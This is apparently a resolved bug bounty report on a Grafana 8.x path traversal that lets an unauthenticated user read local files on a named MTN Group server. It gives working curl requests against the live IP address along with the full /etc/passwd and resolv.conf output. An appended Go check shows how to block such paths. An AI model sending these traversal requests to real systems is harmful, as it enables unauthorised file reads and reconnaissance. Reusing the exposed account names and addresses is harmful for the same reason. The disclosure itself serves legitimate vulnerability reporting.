Path traversal vulnerability in Grafana 8.x allows local file read
Critical
MTN Group
Reported by
malagham
Vulnerability Details
Hi team,
I've found a path traversal issue in the Grafana instances hosted on the MTN platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server.
The IP 41.242.91.22 (domain name mtn.com.gn) belongs to MTN Group.
{F1545670} {F1545682}
## Steps To Reproduce:
1. Open the URL http://41.242.91.22:3000/login
{F1545653}
2. Read a file from the server, for example /etc/passwd:
Run the following command in a macOS or Linux terminal:
```
curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
Response:
```
MacBook-Pro ~ % curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
libstoragemgmt:x:998:996:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
colord:x:997:995:User for colord:/var/lib/colord:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
gluster:x:995:992:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:x:994:991::/var/lib/chrony:/sbin/nologin
unbound:x:993:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
geoclue:x:992:988:User for geoclue:/var/lib/geoclue:/sbin/nologin
setroubleshoot:x:991:987::/var/lib/setroubleshoot:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
saned:x:990:984:SANE scanner daemon user:/usr/share/sane:/sbin/nologin
gnome-initial-setup:x:989:983::/run/gnome-initial-setup/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
infraop:x:1000:1000:infraop:/home/infraop:/bin/bash
nginx:x:988:982:Nginx web server:/var/lib/nginx:/sbin/nologin
armand_k:x:1001:1001::/home/armand_k:/bin/bash
deploy:x:1002:1002::/home/deploy:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
memcached:x:987:980:Memcached daemon:/run/memcached:/sbin/nologin
redis:x:986:979:Redis Database Server:/var/lib/redis:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
uwayo:x:1003:1003::/home/uwayo:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
mugabo:x:1004:1004::/home/mugabo:/bin/bash
nimble:x:985:978:user for Nimble Streamer:/etc/nimble:/sbin/nologin
arnold:x:1005:1005::/home/arnold:/bin/bash
as_ftp:x:1006:1006::/home/as_ftp:/bin/bash
toure:x:1007:1007::/home/toure:/bin/bash
mayur:x:1008:1008::/home/mayur:/bin/bash
prometheus:x:1009:1009::/home/prometheus:/bin/false
sd-agent:x:984:977:Server Density Agent User:/usr/bin/sd-agent/:/bin/bash
node_exporter:x:983:976::/home/node_exporter:/bin/false
grafana:x:982:975:grafana user:/usr/share/grafana:/sbin/nologin
egales:x:1010:1010::/home/egales:/bin/bash
```
3. Read the Grafana config file /usr/share/grafana/conf/defaults.ini from the server:
```
curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fshare%2Fgrafana%2Fconf%2Fdefaults.ini
```
{F1545689}
4. Read /etc/resolv.conf from the server:
```
curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fresolv.conf
```
```
MacBook-Pro ~ % curl http://41.242.91.22:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fresolv.conf
# Generated by NetworkManager
nameserver 102.176.175.67
nameserver 102.176.175.93
```
Thank you.
## Impact
An unauthenticated user can read any file on the server if they know its exact path.
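An added containment check, not from the report and not Grafana's own code, showing how a plugin-asset handler can refuse the request shape above: the asset segment is percent-decoded before cleaning, so the `..%2F` sequences collapse into `..` segments and the cleaned result is tested against the plugin directory. The `ResolvePluginAsset` name and the `/usr/share/grafana/public/plugins/mysql` root are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned when the resolved path escapes the plugin directory.
var ErrOutsideRoot = errors.New("requested path resolves outside the plugin directory")

// ResolvePluginAsset maps the asset part of a /public/plugins/<id>/<asset> request
// onto a file under pluginDir, or refuses it when the decoded, cleaned path escapes.
// (Hypothetical handler helper written for this example.)
func ResolvePluginAsset(pluginDir, rawAsset string) (string, error) {
	// Decode percent-encoding first: "..%2F" only becomes "../" after decoding,
	// so a traversal check on the raw string would miss it.
	asset, err := url.PathUnescape(rawAsset)
	if err != nil {
		return "", err
	}
	if strings.ContainsRune(asset, 0) {
		return "", errors.New("NUL byte in path")
	}
	root := filepath.Clean(pluginDir)
	// Join cleans the result, collapsing every ".." segment. Containment is then a
	// prefix test with a trailing separator, so "/plugins/mysql2" is not accepted
	// as a child of "/plugins/mysql".
	full := filepath.Join(root, asset)
	if full != root && !strings.HasPrefix(full, root+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return full, nil
}

func main() {
	root := "/usr/share/grafana/public/plugins/mysql" // assumed plugin directory
	for _, asset := range []string{
		"img/logo.svg",
		"..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", // request shape from the report
	} {
		p, err := ResolvePluginAsset(root, asset)
		fmt.Printf("%q -> %q %v\n", asset, p, err)
	}
}
```

The same prefix test also rejects the plain `../` form and lowercase `%2f` encoding, since all of them reach the check only after decoding and cleaning.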
Report Details
State
Closed
Substate
Resolved